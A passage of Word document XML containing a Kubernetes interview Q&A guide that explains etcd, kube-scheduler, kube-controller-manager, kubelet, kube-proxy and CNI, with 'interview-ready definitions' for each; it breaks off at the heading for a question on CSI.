        <w:br/>
        <w:t>Key properties of etcd</w:t>
        <w:br/>
        <w:t>1. Distributed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs as a cluster (usually 3, 5, or 7 nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prevents single point of failure</w:t>
        <w:br/>
        <w:t>2. Strong consistency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Uses Raft consensus algorithm</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures all nodes agree on data</w:t>
        <w:br/>
        <w:t>3. Highly available</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Survives node failures as long as quorum exists</w:t>
        <w:br/>
        <w:t>4. Fast key-value store</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Optimized for read/write of small metadata, not large files</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Kubernetes uses etcd</w:t>
        <w:br/>
        <w:t>Because it needs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reliable state storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Consistency across cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fast read/write for control plane decisions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example of stored data (simplified)</w:t>
        <w:br/>
        <w:t>/registry/pods/default/nginx-pod → Pod spec + status</w:t>
        <w:br/>
        <w:t>/registry/nodes/node-1 → Node metadata</w:t>
        <w:br/>
        <w:t>/registry/deployments/default/web → Deployment spec</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important concept: quorum</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * In a 3-node etcd cluster → at least 2 must be alive</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prevents split-brain situations</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Failure impact</w:t>
        <w:br/>
        <w:t>If etcd is down:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes cannot create, update, or delete resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Existing workloads may keep running, but cluster becomes unmanageable</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>etcd is a distributed, strongly consistent key-value store used by Kubernetes to store all cluster state and configuration data, and it serves as the single source of truth for the entire cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q251. What is kube-scheduler?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The kube-scheduler is a core component of Kubernetes that is responsible for deciding which node a newly created pod should run on.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>The scheduler does not run pods—it only decides where they should run.</w:t>
        <w:br/>
        <w:t>It takes unscheduled pods and assigns them to the most suitable node.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (high level flow)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q252. A pod is created via kube-apiserver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 2. The pod has no node assigned</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. kube-scheduler watches for such pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. It evaluates all available nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. It selects the best node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. It writes the decision back via the API server</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Scheduling process (two phases)</w:t>
        <w:br/>
        <w:t>1. Filtering (Predicates)</w:t>
        <w:br/>
        <w:t>Removes nodes that are not eligible:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not enough CPU/memory</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node selectors mismatch</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Taints not tolerated</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node is unschedulable</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Scoring (Priorities)</w:t>
        <w:br/>
        <w:t>Ranks remaining nodes based on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Resource availability (CPU, memory)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Affinity/anti-affinity rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Custom scheduling policies</w:t>
        <w:br/>
        <w:t>The highest-scoring node is selected.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Factors considered during scheduling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CPU &amp; memory requests</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node labels</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod affinity/anti-affinity rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Taints and tolerations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Volume constraints (storage binding)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Topology constraints (zone/region spread)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t>If you deploy a pod requiring:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * 2 CPU</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * 4 GB RAM</w:t>
        <w:br/>
        <w:t>The scheduler:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Excludes nodes without enough resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Chooses a node with optimal capacity and balance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Assigns the pod to that node</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stateless component</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuously watches for unscheduled pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pluggable (supports custom schedulers)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Can be extended with scheduling policies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Scheduler vs other components</w:t>
        <w:br/>
        <w:t>Component</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-scheduler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Decides where pod runs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubelet</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Actually runs the pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-apiserver</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Receives and stores requests</w:t>
        <w:br/>
        <w:tab/>
        <w:t>etcd</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stores cluster state</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>The kube-scheduler is a Kubernetes control plane component that watches for unscheduled pods and assigns them to appropriate nodes based on resource requirements, policies, and constraints like affinity, taints, and available capacity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q253. Explain kube-controller-manager.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The kube-controller-manager is a core component of Kubernetes that runs controller loops to ensure the cluster’s actual state continuously matches the desired state.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>It is the “reconciliation engine” of Kubernetes.</w:t>
        <w:br/>
        <w:t>If something drifts from the desired state, controllers inside this component fix it automatically.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What it does</w:t>
        <w:br/>
        <w:t>The kube-controller-manager runs multiple controllers, each responsible for a specific part of the system:</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key controllers inside it</w:t>
        <w:br/>
        <w:t>1. Node Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitors node health</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Marks nodes as NotReady if they stop responding</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Evicts pods from unhealthy nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Replication Controller / ReplicaSet Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures the correct number of pod replicas are running</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If a pod dies → creates a new one</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Deployment Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles rollout and updates of Deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manages ReplicaSets behind the scenes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Job Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures Jobs complete successfully</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Restarts failed pods if needed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Endpoint Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Updates Service endpoints when pods change</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. Service Account &amp; Token Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manages default service accounts and access tokens</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (loop model)</w:t>
        <w:br/>
        <w:t>Each controller runs a loop:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Watch current state (via Kubernetes API)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Compare with desired state</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Take corrective action if mismatch exists</w:t>
        <w:br/>
        <w:t>This is called the control loop / reconciliation loop.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t>If a Deployment says:</w:t>
        <w:br/>
        <w:t>“Run 3 replicas of nginx”</w:t>
        <w:br/>
        <w:t>But only 2 are running:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Controller detects mismatch</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Creates 1 new pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Restores desired state (3 pods)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Relationship with other components</w:t>
        <w:br/>
        <w:t>Component</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-apiserver</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Entry point for cluster</w:t>
        <w:br/>
        <w:tab/>
        <w:t>etcd</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stores cluster state</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-scheduler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Assigns pods to nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-controller-manager</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Maintains desired state</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubelet</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs containers on nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs multiple controllers in a single process</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stateless (state is stored in etcd)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuously watches cluster via API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures self-healing behavior</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>The kube-controller-manager is a Kubernetes control plane component that runs multiple controllers responsible for continuously reconciling the cluster state with the desired state by monitoring resources and performing corrective actions like creating or deleting pods, updating endpoints, and managing node health.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q254. What is kubelet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The kubelet is the primary node-level agent in Kubernetes that runs on every worker node and is responsible for making sure containers inside Pods are running as expected.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>If Kubernetes decides what should run, kubelet ensures it is actually running on the node.</w:t>
        <w:br/>
        <w:t>It is the bridge between the control plane and the container runtime.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What kubelet does</w:t>
        <w:br/>
        <w:t>1. Pod execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Receives Pod specs from the API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures containers are created and running</w:t>
        <w:br/>
        <w:t>2. Container health monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuously checks container status</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Restarts containers if they fail (based on restart policy)</w:t>
        <w:br/>
        <w:t>3. Node registration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Registers the node with the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reports node health and resource usage</w:t>
        <w:br/>
        <w:t>4. Volume management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Mounts and unmounts storage volumes for pods</w:t>
        <w:br/>
        <w:t>5. Status reporting</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sends pod and node status back to the API server</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (flow)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Pod is scheduled on a node by kube-scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. API server sends pod spec to the node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. kubelet on that node receives the spec</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. kubelet instructs the container runtime (Docker/containerd)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Containers are created and managed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. kubelet monitors and reports status continuously</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kubelet vs container runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * kubelet = orchestrator agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * container runtime (e.g., containerd) = executes containers</w:t>
        <w:br/>
        <w:t>kubelet tells the runtime what to run.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key responsibilities summary</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Run pods on the node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitor and restart containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Report node/pod status</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manage storage and networking setup for pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs on every worker node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Communicates with kube-apiserver</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Does NOT make scheduling decisions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Is essential for node operation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>The kubelet is a node-level agent in Kubernetes that runs on each worker node and ensures that the containers defined in Pod specifications are running and healthy by interacting with the container runtime and reporting status back to the control plane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q255. Explain kube-proxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kube-proxy is a node-level networking component in Kubernetes that enables network communication to Services by routing traffic to the correct Pods.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>kube-proxy makes Kubernetes Services actually work by forwarding traffic from a Service IP to backend Pod IPs.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it exists</w:t>
        <w:br/>
        <w:t>Pods are ephemeral (they can come and go), so their IPs change.</w:t>
        <w:br/>
        <w:t>kube-proxy solves this by providing a stable virtual IP (Service IP) and handling routing behind the scenes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What kube-proxy does</w:t>
        <w:br/>
        <w:t>1. Watches Services and Endpoints</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuously monitors the API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Tracks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services (ClusterIP)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod endpoints</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Programs networking rules on the node</w:t>
        <w:br/>
        <w:t>Depending on mode, it creates rules using:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * iptables (most common)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IPVS (high performance mode)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Userspace mode (legacy)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Load balances traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributes requests across healthy pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Performs simple round-robin / hashing depending on mode</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow example</w:t>
        <w:br/>
        <w:t>When a client hits a Service:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Client sends request to Service IP</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. kube-proxy rules intercept it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Traffic is redirected to one of the backend Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Response is returned to client</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>If a Service has 3 Pods:</w:t>
        <w:br/>
        <w:t>Pod A</w:t>
        <w:br/>
        <w:t>Pod B</w:t>
        <w:br/>
        <w:t>Pod C</w:t>
        <w:br/>
        <w:t>kube-proxy ensures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Requests to Service → distributed across A, B, C</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Modes of kube-proxy</w:t>
        <w:br/>
        <w:t>1. iptables mode (default)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Uses Linux iptables rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fast and widely used</w:t>
        <w:br/>
        <w:t>2. IPVS mode</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kernel-based load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better performance at scale</w:t>
        <w:br/>
        <w:t>3. userspace mode (legacy)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Old implementation, rarely used today</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key responsibilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Implements Service networking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Maintains routing rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enables load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures Service discovery works internally</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What kube-proxy is NOT</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * It does NOT run containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * It does NOT schedule pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * It does NOT create services</w:t>
        <w:br/>
        <w:t>It only handles network routing logic on nodes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>kube-proxy is a Kubernetes node agent that maintains network rules on each node to enable communication to Services by forwarding and load balancing traffic from a Service IP to the appropriate backend Pods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q256. What is CNI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CNI (Container Network Interface) is a standard specification used in Kubernetes to define how networking is configured for containers (Pods).</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>CNI defines how pods get IP addresses and how they communicate with each other in a cluster.</w:t>
        <w:br/>
        <w:t>It is not a single tool, but a standard + plugin ecosystem.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why CNI is needed</w:t>
        <w:br/>
        <w:t>In Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Every Pod needs a unique IP</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods must communicate across nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Networking must be pluggable (different vendors)</w:t>
        <w:br/>
        <w:t>CNI solves this by standardizing how networking is done.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How CNI works (high level)</w:t>
        <w:br/>
        <w:t>When a Pod is created:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Kubernetes asks the CNI plugin</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. CNI:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * assigns an IP address to the Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * sets up network routes/bridges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Pod gets network connectivity</w:t>
        <w:br/>
        <w:t>When a Pod is deleted:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CNI cleans up networking resources</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What CNI plugins do</w:t>
        <w:br/>
        <w:t>A CNI plugin is responsible for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IP address assignment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Network namespace setup</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Route configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod-to-pod connectivity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sometimes network policies (depending on plugin)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular CNI plugins</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Calico (networking + security policies)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Flannel (simple overlay networking)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cilium (eBPF-based advanced networking)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Weave Net (mesh networking)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works at pod networking layer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Plugin-based architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Vendor-neutral standard</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Required for Kubernetes networking to function</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Kubernetes like a city:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods = houses</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CNI = electricity + road system provider</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Without CNI → houses exist but cannot communicate</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CNI vs kube-proxy (important interview point)</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CNI</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-proxy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod networking (IP, connectivity)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service routing &amp; load balancing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Network setup</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traffic forwarding</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod-to-pod communication</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service-to-pod communication</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>CNI is a specification used by Kubernetes to define how container networking is configured, including IP assignment and connectivity between pods, implemented through pluggable network providers like Calico, Flannel, and Cilium.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q257. Explain CSI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
